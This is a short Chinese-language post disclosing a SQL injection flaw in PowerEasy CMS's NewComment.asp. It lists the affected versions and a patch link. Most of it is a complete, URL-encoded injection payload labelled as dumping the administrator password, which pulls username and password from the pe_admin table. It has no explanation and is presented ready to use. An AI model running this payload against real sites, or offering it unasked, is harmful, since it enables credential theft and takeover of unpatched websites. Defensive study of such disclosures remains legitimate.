漏洞发现:某牛人
漏洞文件:NewComment.asp
补丁下载:http://bbs.powereasy.net/dispbbs.asp?boardID=67&ID=280136&page=1
影响版本: 所有版本(包括免费版、商业SQL版及Access版)
爆管理员密码:ChannelID=1; ModuleName=Article+A+on+C%2EInfoID%3DA%2EArticleID+where+A%2EChannelID%3D1+and+1%3D1++And+%28Select+Top+1+char%28124%29%2BisNull%28cast%28%5Busername%5D+as+varchar%288000%29%29%2Cchar%2832%29%29%2Bchar%28124%29%2BisNull%28cast%28%5Bpassword%5D+as+varchar%288000%29%29%2Cchar%2832%29%29%2Bchar%28124%29+From+%28Select+Top+1%5Busername%5D%2C%5Bpassword%5D+From+%5Bpe%5Fadmin%5D+Where+1%3D1+Order+by+%5Busername%5D%2C%5Bpassword%5D%29+T+Order+by+%5Busername%5D+desc%2C%5Bpassword%5D+desc%29%3E0%2d%2d
当前位置:
